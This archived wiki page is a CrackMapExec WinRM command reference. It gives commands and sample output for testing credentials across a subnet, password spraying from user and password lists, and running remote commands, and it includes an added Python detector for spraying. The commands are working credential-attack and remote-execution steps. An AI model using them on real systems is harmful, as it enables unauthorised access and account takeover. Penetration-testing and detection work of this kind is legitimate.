This repository has been archived by the owner on Dec 6, 2023. It is now read-only.

WINRM Command Reference

mpgn edited this page Apr 30, 2020 · 5 revisions

WinRM: Command Reference

Updated: 28/04/2020
CME Version: 5.0.1dev


WinRM Connection

Testing credentials

#~ cme winrm 192.168.1.0/24 -u user -p password

Expected Results:

WINRM       192.168.255.131 5985   ROGER            [*] http://192.168.255.131:5985/wsman
WINRM       192.168.255.131 5985   ROGER            [+] GOLD\user:password (Pwn3d!)

If the SMB port is closed, you can also use the -d DOMAIN flag to avoid an SMB connection.

#~ cme winrm 192.168.1.0/24 -u user -p password -d DOMAIN

Expected Results:

WINRM       192.168.255.131 5985   192.168.255.131  [*] http://192.168.255.131:5985/wsman
WINRM       192.168.255.131 5985   192.168.255.131  [+] GOLD\user:password (Pwn3d!)

Password spraying (without bruteforce)

#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

Expected Results:

WINRM       192.168.255.131 5985   ROGER            [*] http://192.168.255.131:5985/wsman
WINRM       192.168.255.131 5985   ROGER            [-] GOLD\test1:pass1 "Failed to authenticate the user test1 with ntlm"
WINRM       192.168.255.131 5985   ROGER            [+] GOLD\bonclay:Password@123 (Pwn3d!)

Note: By default, CME exits after a successful login is found. With the --continue-on-success flag, it continues spraying even after a valid password is found. This is useful for spraying a single password against a large user list.
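Seen from the target side, the spray described above shows up as one source failing against many distinct accounts in a short time. The following is an added example, not part of the original wiki or of CME: a detector over failed-logon records. The record layout (timestamp, source IP, account), the source addresses, the thresholds, and the account names other than test1 and bonclay are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs): failed logons exported as
# "ISO timestamp,source IP,target account". The field layout is an assumption.
SAMPLE = """\
2020-04-28T10:00:01,192.168.255.10,GOLD\\test1
2020-04-28T10:00:02,192.168.255.10,GOLD\\test2
2020-04-28T10:00:03,192.168.255.10,GOLD\\test3
2020-04-28T10:00:04,192.168.255.10,GOLD\\test4
2020-04-28T10:00:05,192.168.255.10,GOLD\\test5
2020-04-28T10:03:00,192.168.255.20,GOLD\\bonclay
2020-04-28T10:03:30,192.168.255.20,GOLD\\bonclay
2020-04-28T10:04:00,192.168.255.20,GOLD\\bonclay
2020-04-28T11:30:00,192.168.255.10,GOLD\\test6
"""

def parse(text):
    """Yield (time, source_ip, account) tuples, skipping malformed lines."""
    for line in text.splitlines():
        parts = [p.strip() for p in line.split(",")]
        if len(parts) != 3:
            continue
        try:
            yield datetime.fromisoformat(parts[0]), parts[1], parts[2].lower()
        except ValueError:
            continue

def detect_spray(events, min_users=5, window=timedelta(minutes=10)):
    """Return {source_ip: accounts} for sources that failed against at
    least min_users distinct accounts inside one sliding time window."""
    by_src = defaultdict(list)
    for ts, src, user in sorted(events):
        by_src[src].append((ts, user))
    hits = {}
    for src, rows in by_src.items():
        start = 0
        for end in range(len(rows)):
            # Shrink the window from the left until it spans <= `window`.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            users = {u for _, u in rows[start:end + 1]}
            if len(users) >= min_users:
                hits[src] = sorted(users)
                break
    return hits

if __name__ == "__main__":
    for src, users in detect_spray(parse(SAMPLE)).items():
        print(f"possible spray from {src}: {len(users)} accounts")
```

Repeated failures against a single account (the second source in the sample) are deliberately not flagged here; that pattern is better covered by per-account lockout thresholds.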


Execute Command

#~ cme winrm 192.168.255.131 -u user -p 'password' -X whoami
WINRM       192.168.255.131 5985   ROGER            [*] http://192.168.255.131:5985/wsman
WINRM       192.168.255.131 5985   ROGER            [+] GOLD\user:password (Pwn3d!)
WINRM       192.168.255.131 5985   ROGER            [+] Executed command
WINRM       192.168.255.131 5985   ROGER            gold\user